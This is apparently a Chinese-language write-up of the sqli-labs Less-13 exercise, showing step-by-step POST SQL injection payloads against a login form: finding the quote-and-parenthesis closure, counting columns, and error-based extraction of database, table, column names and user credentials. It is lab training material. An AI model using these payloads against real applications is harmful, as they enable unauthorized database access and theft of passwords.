Less-13 post+布尔盲注
首先通过burp suite抓包获取报文体:
利用harkbar插件进行注入:
判断闭合方式:
uname=’)or 1=1 #&passwd=&submit=Submit 发现闭合方式为(‘’)
uname=’))#&passwd=&submit=Submit
本关卡没有回显,只有正误判断和报错信息,我们可以使用布尔盲注、延时注入或者报错注入,这里我么使用报注入。
判断字段列数:
uname=’) group by 3 #&passwd=&submit=Submit 返回错误,
uname=’) group by 2 #&passwd=&submit=Submit 无回显,说明有2列
获取当前数据库:
uname=’) union select count(*),concat(database(),’/’,floor(rand(0)*2))x from information_schema.columns group by x #&passwd=&submit=Submit
获取所有数据库:
uname=’) union select count(*),concat((select group_concat(schema_name) from information_schema.schemata),’/’,floor(rand(0)*2))x from information_schema.schemata group by x#&passwd=&submit=Submit
获取security数据库中的表:
(这里select和group_concat联合使用的话,直接显示成功登录,因此改为limit逐个输出)
uname=’) union select count(*),concat((select table_name from information_schema.tables where table_schema=‘security’ limit 0,1),0x26,floor(rand(0)*2))x from information_schema.columns group by x – #&passwd=&submit=Submit
获取users表中的字段:
(这里select 和group_concat又可以联合使用)
uname=’) union select count(*),concat((select group_concat(column_name) from information_schema.columns where table_schema=‘security’ and table_name=‘users’),0x26,floor(rand(0)*2))x from information_schema.columns group by x #&passwd=&submit=Submit
查询username字段的信息:
(这里select和group_concat又不能联合使用,只能使用limit)
uname=’) union select count(*),concat((select username from users limit 0,1),0x26,floor(rand(0)*2))x from security.users group by x #&passwd=&submit=Submit
查询password字段的信息:
uname=’) union select count(*),concat((select password from users limit 0,1),0x26,floor(rand(0)*2))x from security.users group by x #&passwd=&submit=Submit
将username和password连接后输出
(同样的无法用group¬_concat进行联合输出)
uname=’) union select count(*),concat((select concat_ws(’~’,username,password) from users limit 0,1),0x26,floor(rand(0)*2))x from security.users group by x #&passwd=&submit=Submit
持续更新中。。。。。